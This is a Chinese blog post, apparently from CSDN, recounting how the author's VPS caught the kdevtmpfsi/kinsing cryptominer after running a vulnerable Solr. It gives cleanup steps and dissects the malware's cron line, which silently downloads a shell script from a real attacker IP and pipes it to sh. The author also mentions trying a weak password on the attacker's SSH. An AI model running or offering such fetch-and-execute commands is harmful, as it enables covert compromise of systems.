(虚假的应急响应)记一次我云服务器中了挖矿病毒kdevtmpfsi的经历

最新推荐文章于 2024-06-12 16:32:09 发布
最新推荐文章于 2024-06-12 16:32:09 发布
阅读量704 收藏 3
点赞数
分类专栏: 应急响应
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/109176572
版权

1、话说在我10.16号搭建solr复现CVE-2020-13957的时候,为了图省事直接在我的vps本地搭建了一下。

2、今天登陆vps发现,卧槽怎么100%占用,top一下。

好家伙,这是个啥。

3、我一搜发现是个挖矿病毒。赶紧搜一下怎么解决。

删除守护进程

ps -aux | grep kinsing

删除原进程

ps -aux | grep kdevtmpfsi

删除掉相关文件

cd /tmp

rm -rf kdevtmpfsi

rm -rf /var/tmp/kinsing

最后自己可以再检查一下是否还有kdevtmpfsi的相关文件,有的话就继续删除

find / -name kdevtmpfsi

find / -name kinsing

4、我看了一下计划任务,果然。赶紧加个#注释掉。

5、好小子,让我看看这是哪的IP。

让我康康开了什么端口

只有22端口可以弱口令一下,123456

6、话说他是在80端口下载的s.sh文件,为啥没开80呢,难道是定时开启关闭?

7、此时我想找一下s.sh文件写了什么内容。发现并不能找到。这里就有几个知识点。

wget -q -O - http://195.3.146.118/s.sh | sh > /dev/null 2>&1

-q --quiet                                   安静模式(无信息输出)

-O --output-document=FILE      将文档写入FILE

> /dev/null

/dev/null代表linux的空设备文件,所有往这个文件里面写入的内容都会丢失,俗称“黑洞”。那么执行了>/dev/null之后,标准输出就会不再存在,没有任何地方能够找到输出的内容。

2>&1

这条命令用到了重定向绑定,采用&可以将两个输出绑定在一起。这条命令的作用是错误输出将和标准输出同用一个文件描述符,通俗说就是错误输出将会和标准输出输出到同一个地方。

linux在执行shell命令之前,就会确定好所有的输入输出位置,并且从左到右依次执行重定向的命令,所以>/dev/null 2>&1的作用就是让标准输出重定向到/dev/null中(丢弃标准输出),然后错误输出由于重用了标准输出的描述符,所以错误输出也被定向到了/dev/null中,错误输出同样也被丢弃了。执行了这条命令之后,该条shell命令将不会输出任何信息到控制台,也不会有任何信息输出到文件中。

8、简单测试一下。

攻击服务器下放1.sh文件。运行此文件会先输出ok,然后访问攻击机的1888端口。

靶机执行

wget -q -O - http://ip:port/1.sh | sh > /dev/null 2>&1

收到请求,sh文件中的命令实际上已经执行。但是没有输出ok,也没有1.sh文件,

 

daxi0ng
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shell脚本4种执行方式
09-15
Linuxshell脚本的执行通常有4种方式,分别为工作目录执行,绝对路径执行,sh执行,shell环境执行。这篇文章主要介绍了shell脚本4种执行方式 ,需要的朋友可以参考下
shell学习 符号:>、<、>>、<<、>& 、<&
qq_33388707的博客
04-28 4670
1、>常用于将输出写入到日志(清除已有内容后写入) 例如: #!/bin/bash echo "hello world!">1.log 2、>>常用于将输出写入到日志(在已有内容后追加) 例如: #!/bin/bash echo "hello world!">>1.log 参考:shell “>“ 与 “>>“ 的区别_花开花落与云卷云舒的博客-CSDN博客_shell>>在shell脚本,我们经常会看到 “>” 和 “&g
录清除挖矿病毒 solrd 过程
最新发布
爱摄影的小章同学的博客
06-12 545
删除完成发现 所有进程都不见了,此时吓懵了,因为是现网,产线还有很多消息正在往kafka里写数据,。端午节期间,kafka 服务器被黑客攻击了,植入了挖矿病毒 solrd,这个病毒很聪明,内存,CPU并没有异常升高,以致于上班第一天完全没有察觉。此时看到消费kafka 服务都还在,没有注意到第一行的 /tmp/.solr/solrd 病毒,此时它还没有占用多少CPU跟内存。刚kill 完成 再次top -c 发现这个病毒有换了一个进程的id 又起来了,试了几次都没用,于是 查到病毒执行的文件夹。
shell:>& 、& >、2>1、2>&1
chungong2808的博客
07-25 8112
这里的&没有固定的意思 放在>后面的&,表示重定向的目标不是一个文件,而是一个文件描述符,内置的文件描述符如下 1 => stdout 2 => stderr 0 => stdin 换言之 2>1 代表将stderr重定向到当前路径下文件名为1...
【linux命令】Linux shell 2>&1的含义解释(标准输入输出)及nohup后台启动
热门推荐
m0_45406092的博客
02-03 1万+
文章目录1. 首先了解下1和2在Linux代表什么1.1 重定向1.2 标准操作符1.3 关于2 >& 1的含义1.3.1 把标准输出和标准错误输出分别指定到不同的文件1.3.2 把标准输出和标准错误输出指定到同一个文件 1. 首先了解下1和2在Linux代表什么 在Linux系统0 1 2是一个文件描述符: 上面的操作符可以理解成重定向符 1.1 重定向 什么是重定向?我们先来看下不重定向,也就是默认输出: echo "hello" 默认的输出就是输出到屏幕上,那么通过重
解密 Shell 重定向:>、>1、2>、&>、>&、2>&1、1>&2 、/dev/null、>>、>>2、&>>
Laurence的技术博客
09-06 1697
Shell 重定向这部分知识比较琐碎,符号很多,各种操作符又有多种“变种”,所以会让人感觉很凌乱。本文试图对这部分内容做一些规范化的梳理,主要以 GNU 官方文档为准。首先,有必要“温习”一个基础知识点:在Linux上一切皆文件!所有的设备都可以使用一个文件来描述或代表,这一点在重定向操作体现的尤为明显,例如:0,1,2,/dev/null 都是文件,其:0代表文件/dev/stdin,1代表文件/dev/stdout,2代表文件/dev/stderr。而这些文件又分别代表了某种设备:/dev/stdi
云服务器异常测试kdevtmpfsi.rar
12-31
云服务器kdevtmpfsi测试版和处理方法 CPU 会大于100%
一次真实的应急响应案例(Centos)——暴力破解、替换ps命令、留多个后门对应的应急响应靶场
03-10
暴力破解、替换ps命令、留多个houmen-应急响应靶场,应急响应教程:https://blog.csdn.net/weixin_40412037/article/details/123323981?spm=1001.2014.3001.5501
一次 Linux 被入侵,服务器变“矿机”全过程.docx
12-25
一次 Linux 被入侵,服务器变“矿机”全过程
kdevtmpfsi样本.zip
03-16
kdevtmpfsi样本.zip】是一个包含...总结,`kdevtmpfsi`是Linux环境的严重威胁,需要用户和管理员采取积极的预防和响应措施来保护系统安全。通过了解其工作原理、危害和防范方法,我们可以更好地应对这类恶意软件。
linux shell 2>1的含义
01-11
linux shell ”2>&1″的含义 脚本: nohup /mnt/Nand3/H2000G  >/dev/null  2>&1  & 对于& 1 更准确的说应该是文件描述符 1,而1 一般代表的就是STDOUT_FILENO,实际上这个操作就是一个dup2(2)调用.他标准输出到all_result ,然后复制标准输出到文件描述符2(STDERR_FILENO),其后果就是文件描述符1和2指向同一个文件表项,也可以说错误的输出被合并了.其0 表示键盘输入 1表示屏幕输出 2表示错误输出.把标准出错重定向到标准输出,然后扔到/DEV/NULL下面去。通俗的说,就是把所有标准输出和标准
shell 2>&1 输出重定向详解
weixin_42109053的博客
04-15 2325
前言 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、0、1、2的含义 名称 代码 操作符 标准输入(stdin) 0 < 或 << 标准输出(stdout) 1 >,>>,1> 或 1>> 标准错误输出(stderr) 2 2> 或 2>> 编写一个测试脚本 test.sh #!/bin/bash date #打
bash忽略错误继续执行_忽略Shell脚本的特定错误
weixin_39614754的博客
12-22 5085
I have a small snippet of a shell script which has the potential to throw many errors. I have the script currently set to globally stop on all errors. However i would like for this small sub-section i...
理解 shell 脚本的常见用法2>&1
ROVAST的专栏
05-07 751
原文:https://www.brianstorti.com/understanding-shell-script-idiom-redirect/ 在我们接触的 shell 脚本,对 2>&1 一定不陌生,比如 ls foo > /dev/null 2>&1。 本文就来解释下 2>&1 究竟做了什么,并且是如何起作用的。 一、I/O 重定向简介 「重定向」是计算机用来把命令的输出从一个地方,输出到另一个地方。举个例子,默认情况下,我们使用 cat 指令可以把
linux命令行2>&1是什么意思?
m0_51244927的博客
07-18 980
4)0表示标准输入,1表示标准输出,2表示标准错误。command>/dev/null相当于执行力command 1 >/dev/null 执行command产生了标准输出重定向到/dev/null的设备文件。3)/dev/null表示一个空设备,command>/dev/null就是把把command的执行结果重定向到空设备,说白了就是不显示任何信息。1)nohup表示当前用户和系统的会话下进程忽略响应HUP消息,也就是不挂断的运行命令。5)2>&1,相当于把标准错误重定向到标准输出。
PDF转word之后的结果事图片格式,如何改成.doc或.docx格式
okfone 奥凯丰的博客
10-19 709
PDF转Word成功之后的结果文件应该就是.doc或.docx格式的,不会变成图片格式。 可以使用专业的PDF转换器:okfone PDF转换大师点击下载 点击进入【PDF转文件】,导入需要转换的PDF文件,设置文件输出格式、转换模式、输出目录之后点击【开始】就可以转换成Word文件了。 转换成功之后点击列表右侧的“文件夹”图标查看结果文件 ...
Linux0、1、2的含义解释及使用方法讲解
yyyuyangbo的博客
06-09 5229
版权声明:本文为CSDN博主「一个行走的民」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/zhaominpro/article/details/82630528 ———————————————————————————————————————————————————————— A.首先了解下1和2在Linux代表什么 在Linux系统0 1 2是一个文件描述符 名称 代码 操作符 J...
Shell脚本2>&1、>、>>、EOF等符号到底是什么含义
hkl_Forever的博客
10-21 6074
在Linux Shell命令,我们经常会遇到命令类似这样的 >、2>&1 符号,那么这些符号是什么含义,有什么用处呢,下面一起来看下。4、而 >/x/xx.log 代表1标准输出到xx.log文件。1指向xx.log,2>&1,2指向1,即2也指向xx.log。1、>标准输出符号,>/x/xx.log 把运行日志输出到xx.log文件。>>是1>>标准输出的简写。5、所以 2>&1 需要写到 >/x/xx.log 的后面。2、>会覆盖文件内容,>>是在文件内容末尾追加。(3)、>覆盖,>>追加。
【转】服务器挖矿病毒的排查过程
05-25
服务器挖矿病毒是指黑客通过入侵服务器,利用服务器的计算资源进行加密货币挖矿。这种病毒的存在会导致服务器性能下降,甚至导致服务器崩溃。以下是排查服务器挖矿病毒的过程。 1. 检查CPU和内存使用率 服务器挖矿病毒会占用服务器的大量计算资源,导致CPU和内存使用率异常升高。通过检查系统监视器或者运行top命令,可以查看当前的CPU和内存使用率,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 2. 检查网络流量 服务器挖矿病毒需要与矿池进行通信,因此会产生大量的网络流量。通过检查网络监视器或者运行iftop命令,可以查看当前的网络流量,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 3. 检查进程列表 服务器挖矿病毒会在服务器上运行挖矿程序,因此会在进程列表留下痕迹。通过运行ps命令,可以查看当前的进程列表,如果发现有可疑的进程,则很可能是服务器挖矿病毒导致的。 4. 检查系统日志 服务器挖矿病毒会在服务器上留下痕迹,因此可以通过检查系统日志来发现异常行为。通过查看/var/log/auth.log、/var/log/syslog等系统日志文件,可以查找异常登录或者异常命令执行的录,如果发现可疑行为,则很可能是服务器挖矿病毒导致的。 5. 检查防火墙日志 服务器挖矿病毒需要与矿池进行通信,因此需要打开服务器的防火墙端口。通过检查防火墙日志,可以查看服务器上的网络连接情况,如果发现与矿池的连接,则很可能是服务器挖矿病毒导致的。 以上是排查服务器挖矿病毒的基本过程,如果发现服务器确实感染了挖矿病毒,则需要及时采取措施清除病毒,并加强服务器的安全防护措施,避免类似的攻击再次发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值